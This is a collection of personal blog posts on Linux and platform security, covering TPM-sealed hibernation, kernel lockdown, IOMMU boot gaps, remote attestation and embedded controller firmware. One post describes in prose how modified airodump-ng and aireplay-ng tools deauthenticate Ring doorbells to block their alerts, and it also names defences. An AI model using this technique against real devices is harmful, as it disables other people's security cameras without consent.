This is annoying, because normally when we think about attacks on swap we mitigate it by requiring an encrypted swap partition. But in this case, our attacker is root, and so already has access to the plaintext version of the swap partition. Disk encryption doesn’t save us here. We need some way to verify that the hibernation image was written out by the kernel, not by root. And thankfully we have some tools for that.

Trusted Platform Modules (TPMs) are cryptographic coprocessors[7] capable of doing things like generating encryption keys and then encrypting things with them. You can ask a TPM to encrypt something with a key that’s tied to that specific TPM – the OS has no access to the decryption key, and nor does any other TPM. So we can have the kernel generate an encryption key, encrypt part of the hibernation image with it, and then have the TPM encrypt it. We store the encrypted copy of the key in the hibernation image as well. On resume, the kernel reads the encrypted copy of the key, passes it to the TPM, gets the decrypted copy back and is able to verify the hibernation image.

That’s great! Except root can do exactly the same thing. This tells us the hibernation image was generated on this machine, but doesn’t tell us that it was done by the kernel. We need some way to be able to differentiate between keys that were generated in kernel and ones that were generated in userland. TPMs have the concept of “localities” (effectively privilege levels) that would be perfect for this. Userland is only able to access locality 0, so the kernel could simply use locality 1 to encrypt the key. Unfortunately, despite trying pretty hard, I’ve been unable to get localities to work. The motherboard chipset on my test machines simply doesn’t forward any accesses to the TPM unless they’re for locality 0. I needed another approach.

TPMs have a set of Platform Configuration Registers (PCRs), intended for keeping a record of system state. The OS isn’t able to modify the PCRs directly. Instead, the OS provides a cryptographic hash of some material to the TPM. The TPM takes the existing PCR value, appends the new hash to that, and then stores the hash of the combination in the PCR – a process called “extension”. This means that the new value of the TPM depends not only on the value of the new data, it depends on the previous value of the PCR – and, in turn, that previous value depended on its previous value, and so on. The only way to get to a specific PCR value is to either (a) break the hash algorithm, or (b) perform exactly the same sequence of writes. On system reset the PCRs go back to a known value, and the entire process starts again.

Some PCRs are different. PCR 23, for example, can be reset back to its original value without resetting the system. We can make use of that. The first thing we need to do is to prevent userland from being able to reset or extend PCR 23 itself. All TPM accesses go through the kernel, so this is a simple matter of parsing the write before it’s sent to the TPM and returning an error if it’s a sensitive command that would touch PCR 23. We now know that any change in PCR 23’s state will be restricted to the kernel.

When we encrypt material with the TPM, we can ask it to record the PCR state. This is given back to us as metadata accompanying the encrypted secret. Along with the metadata is an additional signature created by the TPM, which can be used to prove that the metadata is both legitimate and associated with this specific encrypted data. In our case, that means we know what the value of PCR 23 was when we encrypted the key. That means that if we simply extend PCR 23 with a known value in-kernel before encrypting our key, we can look at the value of PCR 23 in the metadata. If it matches, the key was encrypted by the kernel – userland can create its own key, but it has no way to extend PCR 23 to the appropriate value first. We now know that the key was generated by the kernel.

But what if the attacker is able to gain access to the encrypted key? Let’s say a kernel bug is hit that prevents hibernation from resuming, and you boot back up without wiping the hibernation image. Root can then read the key from the partition, ask the TPM to decrypt it, and then use that to create a new hibernation image. We probably want to prevent that as well. Fortunately, when you ask the TPM to encrypt something, you can ask that the TPM only decrypt it if the PCRs have specific values. “Sealing” material to the TPM in this way allows you to block decryption if the system isn’t in the desired state. So, we define a policy that says that PCR 23 must have the same value at resume as it did on hibernation. On resume, the kernel resets PCR 23, extends it to the same value it did during hibernation, and then attempts to decrypt the key. Afterwards, it resets PCR 23 back to the initial value. Even if an attacker gains access to the encrypted copy of the key, the TPM will refuse to decrypt it.

And that’s what this patchset implements. There’s one fairly significant flaw at the moment, which is simply that an attacker can just reboot into an older kernel that doesn’t implement the PCR 23 blocking and set up state by hand. Fortunately, this can be avoided using another aspect of the boot process. When you boot something via UEFI Secure Boot, the signing key used to verify the booted code is measured into PCR 7 by the system firmware. In the Linux world, the Shim bootloader then measures any additional keys that are used. By either using a new key to tag kernels that have support for the PCR 23 restrictions, or by embedding some additional metadata in the kernel that indicates the presence of this feature and measuring that, we can have a PCR 7 value that verifies that the PCR 23 restrictions are present. We then seal the key to PCR 7 as well as PCR 23, and if an attacker boots into a kernel that doesn’t have this feature the PCR 7 value will be different and the TPM will refuse to decrypt the secret.

While there’s a whole bunch of complexity here, the process should be entirely transparent to the user. The current implementation requires a TPM 2, and I’m not certain whether TPM 1.2 provides all the features necessary to do this properly – if so, extending it shouldn’t be hard, but also all systems shipped in the past few years should have a TPM 2, so that’s going to depend on whether there’s sufficient interest to justify the work. And we’re also at the early days of review, so there’s always the risk that I’ve missed something obvious and there are terrible holes in this. And, well, given that it took almost 8 years to get the Lockdown patchset into mainline, let’s not assume that I’m good at landing security code.

[1] Other architectures use different terminology here, such as “supervisor” and “user” mode, but it’s broadly equivalent
[2] In theory rings 1 and 2 would allow you to run drivers with privileges somewhere between full kernel access and userland applications, but in reality we just don’t talk about them in polite company
[3] This is how graphics worked in Linux before kernel modesetting turned up. XFree86 would just map your GPU’s registers into userland and poke them directly. This was not a huge win for stability
[4] IOMMUs can help you here, by restricting the memory PCI devices can DMA to or from. The kernel then gets to allocate ranges for device buffers and configure the IOMMU such that the device can’t DMA to anything else. Except that region of memory may still contain sensitive material such as function pointers, and attacks like this can still cause you problems as a result.
[5] This describes why I’m using “allowed” rather than “required” here
[6] Saving the system state to disk and powering down the platform entirely – significantly slower than suspending the system while keeping state in RAM, but also resilient against the system losing power.
[7] With some handwaving around “coprocessor”. TPMs can’t be part of the OS or the system firmware, but they don’t technically need to be an independent component. Intel have a TPM implementation that runs on the Management Engine, a separate processor built into the motherboard chipset. AMD have one that runs on the Platform Security Processor, a small ARM core built into their CPU. Various ARM implementations run a TPM in Trustzone, a special CPU mode that (in theory) is able to access resources that are entirely blocked off from anything running in the OS, kernel or otherwise.

comment count unavailable comments

Filesystem deduplication is a sidechannel

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/55638.html

First off – nothing I’m going to talk about in this post is novel or overly surprising, I just haven’t found a clear writeup of it before. I’m not criticising any design decisions or claiming this is an important issue, just raising something that people might otherwise be unaware of.

With that out of the way: Automatic deduplication of data is a feature of modern filesystems like zfs and btrfs. It takes two forms – inline, where the filesystem detects that data being written to disk is identical to data that already exists on disk and simply references the existing copy rather than, and offline, where tooling retroactively identifies duplicated data and removes the duplicate copies (zfs supports inline deduplication, btrfs only currently supports offline). In a world where disks end up with multiple copies of cloud or container images, deduplication can free up significant amounts of disk space.

What’s the security implication? The problem is that deduplication doesn’t recognise ownership – if two users have copies of the same file, only one copy of the file will be stored[1]. So, if user a stores a file, the amount of free space will decrease. If user b stores another copy of the same file, the amount of free space will remain the same. If user b is able to check how much free space is available, user b can determine whether the file already exists.

This doesn’t seem like a huge deal in most cases, but it is a violation of expected behaviour (if user b doesn’t have permission to read user a’s files, user b shouldn’t be able to determine whether user a has a specific file). But we can come up with some convoluted cases where it becomes more relevant, such as law enforcement gaining unprivileged access to a system and then being able to demonstrate that a specific file already exists on that system. Perhaps more interestingly, it’s been demonstrated that free space isn’t the only sidechannel exposed by deduplication – deduplication has an impact on access timing, and can be used to infer the existence of data across virtual machine boundaries.

As I said, this is almost certainly not something that matters in most real world scenarios. But with so much discussion of CPU sidechannels over the past couple of years, it’s interesting to think about what other features also end up leaking information in ways that may not be obvious.

[1] Deduplication is usually done at the block level rather than the file level, but given zfs’s support for variable sized blocks, identical files should be deduplicated even if they’re smaller than the maximum record size

comment count unavailable comments

Making my doorbell work

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/55312.html

I recently moved house, and the new building has a Doorbird to act as a doorbell and open the entrance gate for people. There’s a documented local control API (no cloud dependency!) and a Home Assistant integration, so this seemed pretty straightforward.

Unfortunately not. The Doorbird is on separate network that’s shared across the building, provided by Moneybrains. We’re also a Monkeybrains customer, so our network connection is plugged into the same router and antenna as the Doorbird one. And, as is common, there’s port isolation between the networks in order to avoid leakage of information between customers. Rather perversely, we are the only people with an internet connection who are unable to ping my doorbell.

I spent most of the past few weeks digging myself out from under a pile of boxes, but we’d finally reached the point where spending some time figuring out a solution to this seemed reasonable. I spent a while playing with port forwarding, but that wasn’t ideal – the only server I run is in the UK, and having packets round trip almost 11,000 miles so I could speak to something a few metres away seemed like a bad plan. Then I tried tethering an old Android device with a data-only SIM, which worked fine but only in one direction (I could see what the doorbell could see, but I couldn’t get notifications that someone had pushed a button, which was kind of the point here).

So I went with the obvious solution – I added a wifi access point to the doorbell network, and my home automation machine now exists on two networks simultaneously (nmcli device modify wlan0 ipv4.never-default true is the magic for “ignore the gateway that the DHCP server gives you” if you want to avoid this), and I could now do link local service discovery to find the doorbell if it changed addresses after a power cut or anything. And then, like magic, everything worked – I got notifications from the doorbell when someone hit our button.

But knowing that an event occurred without actually doing something in response seems fairly unhelpful. I have a bunch of Chromecast targets around the house (a mixture of Google Home devices and Chromecast Audios), so just pushing a message to them seemed like the easiest approach. Home Assistant has a text to speech integration that can call out to various services to turn some text into a sample, and then push that to a media player on the local network. You can group multiple Chromecast audio sinks into a group that then presents as a separate device on the network, so I could then write an automation to push audio to the speaker group in response to the button being pressed.

That’s nice, but it’d also be nice to do something in response. The Doorbird exposes API control of the gate latch, and Home Assistant exposes that as a switch. I’m using Home Assistant’s Google Assistant integration to expose devices Home Assistant knows about to voice control. Which means when I get a house-wide notification that someone’s at the door I can just ask Google to open the door for them.

So. Someone pushes the doorbell. That sends a signal to a machine that’s bridged onto that network via an access point. That machine then sends a protobuf command to speakers on a separate network, asking them to stream a sample it’s providing. Those speakers call back to that machine, grab the sample and play it. At this point, multiple speakers in the house say “Someone is at the door”. I then say “Hey Google, activate the front gate” – the device I’m closest to picks this up and sends it to Google, where something turns my speech back into text. It then looks at my home structure data and realises that the “Front Gate” device is associated with my Home Assistant integration. It then calls out to the home automation machine that received the notification in the first place, asking it to trigger the front gate relay. That device calls out to the Doorbird and asks it to open the gate. And now I have functionality equivalent to a doorbell that completes a circuit and rings a bell inside my home, and a button inside my home that completes a circuit and opens the gate, except it involves two networks inside my building, callouts to the cloud, at least 7 devices inside my home that are running Linux and I really don’t want to know how many computational cycles.

The future is wonderful.

(I work for Google. I do not work on any of the products described in this post. Please god do not ask me how to integrate your IoT into any of this)

comment count unavailable comments

Linux kernel lockdown, integrity, and confidentiality

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/55105.html

The Linux kernel lockdown patches were merged into the 5.4 kernel last year, which means they’re now part of multiple distributions. For me this was a 7-year journey, which means it’s easy to forget that others aren’t as invested in the code as I am. Here’s what these patches are intended to achieve, why they’re implemented in the current form and what people should take into account when deploying the feature.

Root is a user – a privileged user, but nevertheless a user. Root is not identical to the kernel. Processes running as root still can’t dereference addresses that belong to the kernel, are still subject to the whims of the scheduler and so on. But historically that boundary has been very porous. Various interfaces make it straightforward for root to modify kernel code (such as loading modules or using /dev/mem), while others make it less straightforward (being able to load new ACPI tables that can cause the ACPI interpreter to overwrite the kernel, for instance). In the past that wasn’t seen as a significant issue, since there were no widely deployed mechanisms for verifying the integrity of the kernel in the first place. But once UEFI secure boot became widely deployed, this was a problem. If you verify your boot chain but allow root to modify that kernel, the benefits of the verified boot chain are significantly reduced. Even if root can’t modify the on-disk kernel, root can just hot-patch the kernel and then make this persistent by dropping a binary that repeats the process on system boot.

Lockdown is intended as a mechanism to avoid that, by providing an optional policy that closes off interfaces that allow root to modify the kernel. This was the sole purpose of the original implementation, which maps to the “integrity” mode that’s present in the current implementation. Kernels that boot in lockdown integrity mode prevent even root from using these interfaces, increasing assurances that the running kernel corresponds to the booted kernel. But lockdown’s functionality has been extended since then. There are some use cases where preventing root from being able to modify the kernel isn’t enough – the kernel may hold secret information that even root shouldn’t be permitted to see (such as the EVM signing key that can be used to prevent offline file modification), and the integrity mode doesn’t prevent that. This is where lockdown’s confidentiality mode comes in. Confidentiality mode is a superset of integrity mode, with additional restrictions on root’s ability to use features that would allow the inspection of any kernel memory that could contain secrets.

Unfortunately right now we don’t have strong mechanisms for marking which bits of kernel memory contain secrets, so in order to achieve that we end up blocking access to all kernel memory. Unsurprisingly, this compromises people’s ability to inspect the kernel for entirely legitimate reasons, such as using the various mechanisms that allow tracing and probing of the kernel.

How can we solve this? There’s a few ways:

  1. Introduce a mechanism to tag memory containing secrets, and only restrict accesses to this. I’ve tried to do something similar for userland and it turns out to be hard, but this is probably the best long-term solution.
  2. Add support for privileged applications with an appropriate signature that implement policy on the userland side. This is actually possible already, though not straightforward. Lockdown is implemented in the LSM layer, which means the policy can be imposed using any other existing LSM. As an example, we could use SELinux to impose the confidentiality restrictions on most processes but permit processes with a specific SELinux context to use them, and then use EVM to ensure that any process running in that context has a legitimate signature. This is quite a few hoops for a general purpose distribution to jump through.
  3. Don’t use confidentiality mode in general purpose distributions. The attacks it protects against are mostly against special-purpose use cases, and they can enable it themselves.

My recommendation is for (3), and I’d encourage general purpose distributions that enable lockdown to do so only in integrity mode rather than confidentiality mode. The cost of confidentiality mode is just too high compared to the benefits it provides. People who need confidentiality mode probably already know that they do, and should be in a position to enable it themselves and handle the consequences.

comment count unavailable comments

Implementing support for advanced DPTF policy in Linux

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/54923.html

Intel’s Dynamic Platform and Thermal Framework (DPTF) is a feature that’s becoming increasingly common on highly portable Intel-based devices. The adaptive policy it implements is based around the idea that thermal management of a system is becoming increasingly complicated – the appropriate set of cooling constraints to place on a system may differ based on a whole bunch of criteria (eg, if a tablet is being held vertically rather than lying on a table, it’s probably going to be able to dissipate heat more effectively, so you should impose different constraints). One way of providing these criteria to the OS is to embed them in the system firmware, allowing an OS-level agent to read that and then incorporate OS-level knowledge into a final policy decision.

Unfortunately, while Intel have released some amount of support for DPTF on Linux, they haven’t included support for the adaptive policy. And even more annoyingly, many modern laptops run in a heavily conservative thermal state if the OS doesn’t support the adaptive policy, meaning that the CPU throttles down extremely quickly and the laptop runs excessively slowly.

It’s been a while since I really got stuck into a laptop reverse engineering project, and I don’t have much else to do right now, so I’ve been working on this. It’s been a combination of examining what source Intel have released, reverse engineering the Windows code and staring hard at hex dumps until they made some sort of sense. Here’s where I am.

There’s two main components to the adaptive policy – the adaptive conditions table (APCT) and the adaptive actions table (APAT). The adaptive conditions table contains a set of condition sets, with up to 10 conditions in each condition set. A condition is something like “is the battery above a certain charge”, “is this temperature sensor below a certain value”, “is the lid open or closed”, “is the machine upright or horizontal” and so on. Each condition set is evaluated in turn – if all the conditions evaluate to true, the condition set’s target is implemented. If not, we move onto the next condition set. There will typically be a fallback condition set to catch the case where none of the other condition sets evaluate to true.

The action table contains sets of actions associated with a specific target. Once we’ve picked a target by evaluating the conditions, we execute the actions that have a corresponding target. Actions are things like “Set the CPU power limit to this value” or “Load a passive policy table”. Passive policy tables are simply tables associating sensors with devices and an associated temperature limit. If the limit is exceeded, the associated device should be asked to reduce its heat output until the situation is resolved.

There’s a couple of twists. The first is the OEM conditions. These are conditions that refer to values that are exposed by the firmware and are otherwise entirely opaque – the firmware knows what these mean, but we don’t, so conditions that rely on these values are magical. They could be temperature, they could be power consumption, they could be SKU variations. We just don’t know. The other is that older versions of the APCT table didn’t include a reference to a device – ie, if you specified a condition based on a temperature, you had no way to express which temperature sensor to use. So, instead, you specified a condition that’s greater than 0x10000, which tells the agent to look at the APPC table to extract the device and the appropriate actual condition.

Intel already have a Linux app called Thermal Daemon that implements a subset of this – you’re supposed to run the binary-only dptfxtract against your firmware to parse a few bits of the DPTF tables, and it writes out an XML file that Thermal Daemon makes use of. Unfortunately it doesn’t handle most of the more interesting bits of the adaptive performance policy, so I’ve spent the past couple of days extending it to do so and to remove the proprietary dependency.

My current work is here – it requires a couple of kernel patches (that are in the patches directory), and it only supports a very small subset of the possible conditions. It’s also entirely possible that it’ll do something inappropriate and cause your computer to melt – none of this is publicly documented, I don’t have access to the spec and you’re relying on my best guesses in a lot of places. But it seems to behave roughly as expected on the one test machine I have here, so time to get some wider testing?

comment count unavailable comments

What usage restrictions can we place in a free software license?

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/54709.html

Growing awareness of the wider social and political impact of software development has led to efforts to write licenses that prevent software being used to engage in acts that are seen as socially harmful, with the Hippocratic License being perhaps the most discussed example (although the JSON license‘s requirement that the software be used for good, not evil, is arguably an earlier version of the theme). The problem with these licenses is that they’re pretty much universally considered to fall outside the definition of free software or open source licenses due to their restrictions on use, and there’s a whole bunch of people who have very strong feelings that this is a very important thing. There’s also the more fundamental underlying point that it’s hard to write a license like this where everyone agrees on whether a specific thing is bad or not (eg, while many people working on a project may feel that it’s reasonable to prohibit the software being used to support drone strikes, others may feel that the project shouldn’t have a position on the use of the software to support drone strikes and some may even feel that some people should be the victims of drone strikes). This is, it turns out, all quite complicated.

But there is something that many (but not all) people in the free software community agree on – certain restrictions are legitimate if they ultimately provide more freedom. Traditionally this was limited to restrictions on distribution (eg, the GPL requires that your recipient be able to obtain corresponding source code, and for GPLv3 must also be able to obtain the necessary signing keys to be able to replace it in covered devices), but more recently there’s been some restrictions that don’t require distribution. The best known is probably the clause in the Affero GPL (or AGPL) that requires that users interacting with covered code over a network be able to download the source code, but the Cryptographic Autonomy License (recently approved as an Open Source license) goes further and requires that users be able to obtain their data in order to self-host an equivalent instance.

We can construct examples of where these prevent certain fields of endeavour, but the tradeoff has been deemed worth it – the benefits to user freedom that these licenses provide is greater than the corresponding cost to what you can do. How far can that tradeoff be pushed? So, here’s a thought experiment. What if we write a license that’s something like the following:

Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

1. All permissions granted by this license must be passed on to all recipients of modified or unmodified versions of this work
2. This work may not be used in any way that impairs any individual's ability to exercise the permissions granted by this license, whether or not they have received a copy of the covered work

This feels like the logical extreme of the argument. Any way you could use the covered work that would restrict someone else’s ability to do the same is prohibited. This means that, for example, you couldn’t use the software to implement a DRM mechanism that the user couldn’t replace (along the lines of GPLv3’s anti-Tivoisation clause), but it would also mean that you couldn’t use the software to kill someone with a drone (doing so would impair their ability to make use of the software). The net effect is along the lines of the Hippocratic license, but it’s framed in a way that is focused on user freedom.

To be clear, I don’t think this is a good license – it has a bunch of unfortunate consequences like it being impossible to use covered code in self-defence if doing so would impair your attacker’s ability to use the software. I’m not advocating this as a solution to anything. But I am interested in seeing whether the perception of the argument changes when we refocus it on user freedom as opposed to an independent ethical goal.

Thoughts?

Edit:

Rich Felker on Twitter had an interesting thought – if clause 2 above is replaced with:

2. Your rights under this license terminate if you impair any individual's ability to exercise the permissions granted by this license, even if the covered work is not used to do so

how does that change things? My gut feeling is that covering actions that are unrelated to the use of the software might be a reach too far, but it gets away from the idea that it’s your use of the software that triggers the clause.

comment count unavailable comments

Avoiding gaps in IOMMU protection at boot

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/54433.html

When you save a large file to disk or upload a large texture to your graphics card, you probably don’t want your CPU to sit there spending an extended period of time copying data between system memory and the relevant peripheral – it could be doing something more useful instead. As a result, most hardware that deals with large quantities of data is capable of Direct Memory Access (or DMA). DMA-capable devices are able to access system memory directly without the aid of the CPU – the CPU simply tells the device which region of memory to copy and then leaves it to get on with things. However, we also need to get data back to system memory, so DMA is bidirectional. This means that DMA-capable devices are able to read and write directly to system memory.

As long as devices are entirely under the control of the OS, this seems fine. However, this isn’t always true – there may be bugs, the device may be passed through to a guest VM (and so no longer under the control of the host OS) or the device may be running firmware that makes it actively malicious. The third is an important point here – while we usually think of DMA as something that has to be set up by the OS, at a technical level the transactions are initiated by the device. A device that’s running hostile firmware is entirely capable of choosing what and where to DMA.

Most reasonably recent hardware includes an IOMMU to handle this. The CPU’s MMU exists to define which regions of memory a process can read or write – the IOMMU does the same but for external IO devices. An operating system that knows how to use the IOMMU can allocate specific regions of memory that a device can DMA to or from, and any attempt to access memory outside those regions will fail. This was originally intended to handle passing devices through to guests (the host can protect itself by restricting any DMA to memory belonging to the guest – if the guest tries to read or write to memory belonging to the host, the attempt will fail), but is just as relevant to preventing malicious devices from extracting secrets from your OS or even modifying the runtime state of the OS.

But setting things up in the OS isn’t sufficient. If an attacker is able to trigger arbitrary DMA before the OS has started then they can tamper with the system firmware or your bootloader and modify the kernel before it even starts running. So ideally you want your firmware to set up the IOMMU before it even enables any external devices, and newer firmware should actually do this automatically. It sounds like the problem is solved.

Except there’s a problem. Not all operating systems know how to program the IOMMU, and if a naive OS fails to remove the IOMMU mappings and asks a device to DMA to an address that the IOMMU doesn’t grant access to then things are likely to explode messily. EFI has an explicit transition between the boot environment and the runtime environment triggered when the OS or bootloader calls ExitBootServices(). Various EFI components have registered callbacks that are triggered at this point, and the IOMMU driver will (in general) then tear down the IOMMU mappings before passing control to the OS. If the OS is IOMMU aware it’ll then program new mappings, but there’s a brief window where the IOMMU protection is missing – and a sufficiently malicious device could take advantage of that.

The ideal solution would be a protocol that allowed the OS to indicate to the firmware that it supported this functionality and request that the firmware not remove it, but in the absence of such a protocol we’re left with non-ideal solutions. One is to prevent devices from being able to DMA in the first place, which means the absence of any IOMMU restrictions is largely irrelevant. Every PCI device has a busmaster bit – if the busmaster bit is disabled, the device shouldn’t start any DMA transactions. Clearing that seems like a straightforward approach. Unfortunately this bit is under the control of the device itself, so a malicious device can just ignore this and do DMA anyway. Fortunately, PCI bridges and PCIe root ports should only forward DMA transactions if their busmaster bit is set. If we clear that then any devices downstream of the bridge or port shouldn’t be able to DMA, no matter how malicious they are. Linux will only re-enable the bit after it’s done IOMMU setup, so we should then be in a much more secure state – we still need to trust that our motherboard chipset isn’t malicious, but we don’t need to trust individual third party PCI devices.

This patch just got merged, adding support for this. My original version did nothing other than clear the bits on bridge devices, but this did have the potential for breaking devices that were still carrying out DMA at the moment this code ran. Ard modified it to call the driver shutdown code for each device behind a bridge before disabling DMA on the bridge, which in theory makes this safe but does still depend on the firmware drivers behaving correctly. As a result it’s not enabled by default – you can either turn it on in kernel config or pass the efi=disable_early_pci_dma kernel command line argument.

In combination with firmware that does the right thing, this should ensure that Linux systems can be protected against malicious PCI devices throughout the entire boot process.

comment count unavailable comments

Verifying your system state in a secure and private way

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/54203.html

Most modern PCs have a Trusted Platform Module (TPM) and firmware that, together, support something called Trusted Boot. In Trusted Boot, each component in the boot chain generates a series of measurements of next component of the boot process and relevant configuration. These measurements are pushed to the TPM where they’re combined with the existing values stored in a series of Platform Configuration Registers (PCRs) in such a way that the final PCR value depends on both the value and the order of the measurements it’s given. If any measurements change, the final PCR value changes.

Windows takes advantage of this with its Bitlocker disk encryption technology. The disk encryption key is stored in the TPM along with a policy that tells it to release it only if a specific set of PCR values is correct. By default, the TPM will release the encryption key automatically if the PCR values match and the system will just transparently boot. If someone tampers with the boot process or configuration, the PCR values will no longer match and boot will halt to allow the user to provide the disk key in some other way.

Unfortunately the TPM keeps no record of how it got to a specific state. If the PCR values don’t match, that’s all we know – the TPM is unable to tell us what changed to result in this breakage. Fortunately, the system firmware maintains an event log as we go along. Each measurement that’s pushed to the TPM is accompanied by a new entry in the event log, containing not only the hash that was pushed to the TPM but also metadata that tells us what was measured and why. Since the algorithm the TPM uses to calculate the hash values is known, we can replay the same values from the event log and verify that we end up with the same final value that’s in the TPM. We can then examine the event log to see what changed.

Unfortunately, the event log is stored in unprotected system RAM. In order to be able to trust it we need to compare the values in the event log (which can be tampered with) with the values in the TPM (which are much harder to tamper with). Unfortunately if someone has tampered with the event log then they could also have tampered with the bits of the OS that are doing that comparison. Put simply, if the machine is in a potentially untrustworthy state, we can’t trust that machine to tell us anything about itself.

This is solved using a procedure called Remote Attestation. The TPM can be asked to provide a digital signature of the PCR values, and this can be passed to a remote system along with the event log. That remote system can then examine the event log, make sure it corresponds to the signed PCR values and make a security decision based on the contents of the event log rather than just on the final PCR values. This makes the system significantly more flexible and aids diagnostics. Unfortunately, it also means you need a remote server and an internet connection and then some way for that remote server to tell you whether it thinks your system is trustworthy and also you need some way to believe that the remote server is trustworthy and all of this is well not ideal if you’re not an enterprise.

Last week I gave a talk at linux.conf.au on one way around this. Basically, remote attestation places no constraints on the network protocol in use – while the implementations that exist all do this over IP, there’s no requirement for them to do so. So I wrote an implementation that runs over Bluetooth, in theory allowing you to use your phone to serve as the remote agent. If you trust your phone, you can use it as a tool for determining if you should trust your laptop.

I’ve pushed some code that demos this. The current implementation does nothing other than tell you whether UEFI Secure Boot was enabled or not, and it’s also not currently running on a phone. The phone bit of this is pretty straightforward to fix, but the rest is somewhat harder.

The big issue we face is that we frequently don’t know what event log values we should be seeing. The first few values are produced by the system firmware and there’s no standardised way to publish the expected values. The Linux Vendor Firmware Service has support for publishing these values, so for some systems we can get hold of this. But then you get to measurements of your bootloader and kernel, and those change every time you do an update. Ideally we’d have tooling for Linux distributions to publish known good values for each package version and for that to be common across distributions. This would allow tools to download metadata and verify that measurements correspond to legitimate builds from the distribution in question.

This does still leave the problem of the initramfs. Since initramfs files are usually generated locally, and depend on the locally installed versions of tools at the point they’re built, we end up with no good way to precalculate those values. I proposed a possible solution to this a while back, but have done absolutely nothing to help make that happen. I suck. The right way to do this may actually just be to turn initramfs images into pre-built artifacts and figure out the config at runtime (dracut actually supports a bunch of this already), so I’m going to spend a while playing with that.

If we can pull these pieces together then we can get to a place where you can boot your laptop and then, before typing any authentication details, have your phone compare each component in the boot process to expected values. Assistance in all of this extremely gratefully received.

comment count unavailable comments

Wifi deauthentication attacks and home security

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/53968.html

I live in a large apartment complex (it’s literally a city block big), so I spend a disproportionate amount of time walking down corridors. Recently one of my neighbours installed a Ring wireless doorbell. By default these are motion activated (and the process for disabling motion detection is far from obvious), and if the owner subscribes to an appropriate plan these recordings are stored in the cloud. I’m not super enthusiastic about the idea of having my conversations recorded while I’m walking past someone’s door, so I decided to look into the security of these devices.

One visit to Amazon later and I had a refurbished Ring Video Doorbell 2™ sitting on my desk. Tearing it down revealed it uses a TI SoC that’s optimised for this sort of application, linked to a DSP that presumably does stuff like motion detection. The device spends most of its time in a sleep state where it generates no network activity, so on any wakeup it has to reassociate with the wireless network and start streaming data.

So we have a device that’s silent and undetectable until it starts recording you, which isn’t a great place to start from. But fortunately wifi has a few, uh, interesting design choices that mean we can still do something. The first is that even on an encrypted network, the packet headers are unencrypted and contain the address of the access point and whichever device is communicating. This means that it’s possible to just dump whatever traffic is floating past and build up a collection of device addresses. Address ranges are allocated by the IEEE, so it’s possible to map the addresses you see to manufacturers and get some idea of what’s actually on the network[1] even if you can’t see what they’re actually transmitting. The second is that various management frames aren’t encrypted, and so can be faked even if you don’t have the network credentials.

The most interesting one here is the deauthentication frame that access points can use to tell clients that they’re no longer welcome. These can be sent for a variety of reasons, including resource exhaustion or authentication failure. And, by default, they’re entirely unprotected. Anyone can inject such a frame into your network and cause clients to believe they’re no longer authorised to use the network, at which point they’ll have to go through a new authentication cycle – and while they’re doing that, they’re not able to send any other packets.

So, the attack is to simply monitor the network for any devices that fall into the address range you want to target, and then immediately start shooting deauthentication frames at them once you see one. I hacked airodump-ng to ignore all clients that didn’t look like a Ring, and then pasted in code from aireplay-ng to send deauthentication packets once it saw one. The problem here is that wifi cards can only be tuned to one frequency at a time, so unless you know the channel your potential target is on, you need to keep jumping between frequencies while looking for a target – and that means a target can potentially shoot off a notification while you’re looking at other frequencies.

But even with that proviso, this seems to work reasonably reliably. I can hit the button on my Ring, see it show up in my hacked up code and see my phone receive no push notification. Even if it does get a notification, the doorbell is no longer accessible by the time I respond.

There’s a couple of ways to avoid this attack. The first is to use 802.11w which protects management frames. A lot of hardware supports this, but it’s generally disabled by default. The second is to just ignore deauthentication frames in the first place, which is a spec violation but also you’re already building a device that exists to record strangers engaging in a range of legal activities so paying attention to social norms is clearly not a priority in any case.

Finally, none of this is even slightly new. A presentation from Def Con in 2016 covered this, demonstrating that Nest cameras could be blocked in the same way. The industry doesn’t seem to have learned from this.

[1] The Ring Video Doorbell 2 just uses addresses from TI’s range rather than anything Ring specific, unfortunately

comment count unavailable comments

Extending proprietary PC embedded controller firmware

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/53703.html

I’m still playing with my X210, a device that just keeps coming up with new ways to teach me things. I’m now running Coreboot full time, so the majority of the runtime platform firmware is free software. Unfortunately, the firmware that’s running on the embedded controller (a separate chip that’s awake even when the rest of the system is asleep and which handles stuff like fan control, battery charging, transitioning into different power states and so on) is proprietary and the manufacturer of the chip won’t release data sheets for it. This was disappointing, because the stock EC firmware is kind of annoying (there’s no hysteresis on the fan control, so it hits a threshold, speeds up, drops below the threshold, turns off, and repeats every few seconds – also, a bunch of the Thinkpad hotkeys don’t do anything) and it would be nice to be able to improve it.

A few months ago someone posted a bunch of fixes, a Ghidra project and a kernel patch that lets you overwrite the EC’s code at runtime for purposes of experimentation. This seemed promising. Some amount of playing later and I’d produced a patch that generated keyboard scancodes for all the missing hotkeys, and I could then use udev to map those scancodes to the keycodes that the thinkpad_acpi driver would generate. I finally had a hotkey to tell me how much battery I had left.

But something else included in that post was a list of the GPIO mappings on the EC. A whole bunch of hardware on the board is connected to the EC in ways that allow it to control them, including things like disabling the backlight or switching the wifi card to airplane mode. Unfortunately the ACPI spec doesn’t cover how to control GPIO lines attached to the embedded controller – the only real way we have to communicate is via a set of registers that the EC firmware interprets and does stuff with.

One of those registers in the vendor firmware for the X210 looked promising, with individual bits that looked like radio control. Unfortunately writing to them does nothing – the EC firmware simply stashes that write in an address and returns it on read without parsing the bits in any way. Doing anything more with them was going to involve modifying the embedded controller code.

Thankfully the EC has 64K of firmware and is only using about 40K of that, so there’s plenty of room to add new code. The problem was generating the code in the first place and then getting it called. The EC is based on the CR16C architecture, which binutils supported until 10 days ago. To be fair it didn’t appear to actually work, and binutils still has support for the more generic version of the CR16 family, so I built a cross assembler, wrote some assembly and came up with something that Ghidra was willing to parse except for one thing.

